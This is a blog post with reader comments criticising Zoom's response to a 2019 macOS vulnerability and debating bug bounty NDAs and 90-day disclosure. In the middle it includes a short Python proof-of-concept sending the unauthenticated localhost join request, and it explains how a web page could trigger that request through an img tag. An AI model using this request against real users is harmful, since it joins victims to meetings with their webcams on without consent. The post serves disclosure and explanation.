Zoom had a vulnerability that allowed users on macOS to be connected to a video conference, with their webcam active, simply by visiting an appropriately crafted page. Zoom's response has largely been to argue that:

a) There's a setting you can toggle to disable the webcam being on by default, so this isn't a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience, so they were justified in working around it (thereby introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they'd only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom's decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we'd presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.
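
For context on how "an appropriately crafted page" could do this: the public write-up of the vulnerability described a web server the Zoom client installed on localhost, which would join a meeting in response to a bare GET request. The sketch below shows the request such a page effectively triggers; the port, endpoint, and parameter names are taken from that public disclosure rather than from anything above, so treat them as assumptions about the affected client.

    # A minimal sketch of the request an "appropriately crafted page" makes,
    # per the public disclosure: the client installed a helper web server on
    # localhost port 19421 that joined meetings in response to an
    # unauthenticated GET. Port, path, and parameter names are assumptions
    # taken from that write-up, not from this post.
    import urllib.request

    ZOOM_HELPER = "http://localhost:19421"  # local helper server (per disclosure)
    MEETING_ID = "000000000"                # hypothetical meeting number

    # A malicious page could embed this URL in an <img> tag; any visitor's
    # browser would then issue the request, and a vulnerable client would
    # join the attacker's meeting - webcam active, no prompt shown.
    url = ZOOM_HELPER + "/launch?action=join&confno=" + MEETING_ID
    try:
        urllib.request.urlopen(url, timeout=2)
    except OSError:
        print("no vulnerable client listening locally")

This is also why argument (b) rings hollow: Safari's confirmation prompt was precisely the user interaction that this local server existed to bypass.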

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award - being able to give a presentation on the vulnerability at a high-profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can't sign such an NDA - they may have discovered the issue on work time, and their employer's policies may prohibit them from doing so.

Zoom are correct that it's not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they're giving you an opportunity to have the issue fixed before the public knows about it. They've done something they didn't need to do - they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn't - they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that's great. If you want to tie strings to that money, that's a choice you can make - but there's no reason for them to agree to those strings, and if they choose not to then you don't get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they're acting in accordance with widely accepted norms. If you're not able to fix an issue within 90 days, that's very much your problem.

If your bug bounty requires people to sign an NDA, you should think about why. If it's so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you're offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information, and compare that to the reputational damage you'll take from people deciding that it's not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before you've committed to a specific $ amount - it's never reasonable to ask that someone sign away their rights without knowing exactly what they're getting in return.

tl;dr - a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that's entirely within industry norms. Remember that a bargain is being struck here - you offering money isn't being generous, it's you attempting to provide an incentive for people to help you improve your security. If you're asking people to give up more than you're offering in return, don't be surprised if they say no.

Date: 2019-07-10 06:26 am (UTC)
From: [personal profile] drplokta
If I ruled the world, NDAs relating to information that was in your possession before you signed the NDA would be illegal and unenforceable. That would prevent abusive uses like this, where they’re basically used for hush money, while still allowing them to be used to protect legitimate company information.
From: (Anonymous)
Software freedom (the freedom to run, inspect, share, and modify published software) can fix this quite well all on its own. If all of the software involved were free software, nobody would need to consider signing an NDA to get anything fixed. If one developer proposed an NDA, one could simply pick a more cooperative developer instead. Avoiding that competition is part of the reason software developers distribute proprietary software: control over the user lets them impose a monopoly and escape competition over the software.

Date: 2020-09-11 03:14 pm (UTC)
From: (Anonymous)
"NDAs relating to information that was in your possession before you signed the NDA would be illegal and unenforceable" - That would mean that trade secrets would not be trade able. Arguable, intellectual property rights would become close to meaningless.

Date: 2020-09-11 04:23 pm (UTC)
From: [personal profile] drplokta
No, it wouldn’t mean that. You would be required to sign the NDA before the trade secrets were disclosed to you, and they would still be protected.

90 Days

Date: 2019-07-10 09:08 pm (UTC)
From: (Anonymous)
90 days is way too much time. The issue should be made public the moment you find it if you want to disclose it responsibly. It's irresponsible to put people at risk for longer than they have to be.
>but what if the developer doesn't have a fix ready
Who cares? Just tell people to stop using the product.
>but then companies will lose users
Then don't make vulnerable software. It should be illegal to release software with major vulnerabilities. Maybe if these companies were punished hard enough they would actually invest in making secure software. The fact that vulnerabilities happen on a constant basis makes computer engineering the joke of the engineering professions.

Re: 90 Days

Date: 2019-07-11 10:38 am (UTC)
From: [personal profile] lovingboth
"It should be illegal to release software with major vulnerabilities"

Ha, ha, ha.

After a string of insurance companies went bust in the 19th Century, someone suggested - I think it was in Punch magazine - that the directors of the next one to fail be hanged on the grounds that it would encourage all directors to be more prudent.

Perhaps we could adopt that for this.

Re: 90 Days

Date: 2019-07-18 09:08 am (UTC)
From: [personal profile] reddragdiva
or, more generally, a bit more direct personal liability for dangerous corporate incompetence.

Re: 90 Days

Date: 2020-09-11 03:15 pm (UTC)
From: (Anonymous)
While we are at it, let us also hang any surgeon whose patient dies.

Date: 2019-07-12 06:13 pm (UTC)
From: [personal profile] mellowtigger
We use Zoom at work (and some use Macs), so our tech bigwigs have been scrambling this week because of this vulnerability.
